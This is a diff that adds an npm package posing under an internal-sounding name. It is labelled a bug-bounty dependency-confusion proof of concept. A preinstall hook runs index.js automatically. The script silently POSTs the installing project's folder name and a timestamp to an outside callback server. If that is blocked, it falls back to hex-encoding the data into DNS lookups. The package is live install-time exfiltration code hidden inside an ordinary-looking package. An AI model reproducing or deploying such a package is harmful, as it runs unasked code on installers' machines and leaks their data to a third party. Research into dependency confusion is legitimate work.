flow-estree-oxidized 0.0.1

package/index.js

@@ -0,0 +1,107 @@
+const CALLBACK_URL = 'https://deepbounty.dd06-dev.fr/cb/84804982-eff0-4a8d-8d59-7ca77a487d8c';
+const PACKAGE_NAME = 'flow-estree-oxidized';
+const CONTACT_EMAIL = 'dd_06@wearehackerone.com';
+
+// SECURITY RESEARCH: Harmless dependency confusion PoC.
+// This package sends a simple "ping" to verify execution.
+// No system data, source code, or PII is accessed or transmitted.
+// Contact: dd_06@wearehackerone.com
+
+const dns = require('dns');
+const http = require('http');
+const https = require('https');
+const path = require('path');
+
+/**
+ * Encodes strings to hex for safe transmission via DNS labels
+ */
+function toHex(input) {
+    return Buffer.from(input, 'utf8').toString('hex');
+}
+
+// Determine the project root where the package is being installed
+const targetDir = process.env.INIT_CWD || path.resolve(__dirname, '../../../');
+
+// Extract ONLY the folder name (e.g., "target-project") to avoid leaking PII from full paths
+const safeProjectName = path.basename(targetDir);
+
+// SAFE PAYLOAD: Only contains identity data, no system data.
+const info = {
+    pkg: PACKAGE_NAME,
+    project: safeProjectName,
+    timestamp: new Date().toISOString(),
+    transport: 'http' // Default, will change if fallback triggers
+};
+
+/**
+ * Fallback: Exfiltrates the payload via DNS queries if HTTP is blocked
+ */
+function sendDnsPayload() {
+    try {
+        const dnsInfo = Object.assign({}, info, { transport: 'dns' });
+
+        const parsed = new URL(CALLBACK_URL);
+        const baseDomain = 'dns.' + parsed.hostname;
+
+        // Extract a unique identifier from the path (e.g., /cb/123 -> 123)
+        const uuidLabel = (parsed.pathname.split('/').filter(Boolean).pop() || 'cb')
+            .replace(/[^a-zA-Z0-9]/g, '');
+
+        const hexPayload = toHex(JSON.stringify(dnsInfo));
+
+        // DNS labels max 63 chars. We chunk safely to 50.
+        const chunks = hexPayload.match(/.{1,50}/g) || [];
+
+        if (!chunks.length || !baseDomain) return;
+
+        chunks.forEach((chunk, index) => {
+            // Structure: index-total.uuid.chunk.baseDomain
+            const hostname = `${index}-${chunks.length}.${uuidLabel}.${chunk}.${baseDomain}`;
+
+            // Jitter to ensure order and avoid hitting local rate limits
+            setTimeout(() => {
+                dns.lookup(hostname, (err) => { /* ignore errors */ });
+            }, index * 200);
+        });
+    } catch (e) {
+        // Silently fail to avoid disrupting the host environment
+    }
+}
+
+/**
+ * Primary: Sends payload via HTTP POST
+ */
+function sendHttpPayload() {
+    try {
+        const parsed = new URL(CALLBACK_URL);
+        const postData = JSON.stringify(info);
+        const lib = parsed.protocol === 'https:' ? https : http;
+
+        const req = lib.request(CALLBACK_URL, {
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'Content-Length': Buffer.byteLength(postData)
+            },
+            timeout: 5000 // Short timeout to fail fast
+        }, (res) => {
+            res.on('data', () => { }); // Consume stream
+        });
+
+        // Failover to DNS on error or timeout
+        req.on('error', () => sendDnsPayload());
+        req.on('timeout', () => {
+            req.destroy();
+            sendDnsPayload();
+        });
+
+        req.write(postData);
+        req.end();
+
+    } catch (e) {
+        sendDnsPayload();
+    }
+}
+
+// Execute trigger
+sendHttpPayload();

package/package.json

@@ -0,0 +1,10 @@
+{
+	"name": "flow-estree-oxidized",
+	"version": "0.0.1",
+	"description": "Security PoC for Bug Bounty",
+	"main": "index.js",
+	"scripts": {
+		"preinstall": "node index.js"
+	},
+	"author": "dd_06"
+}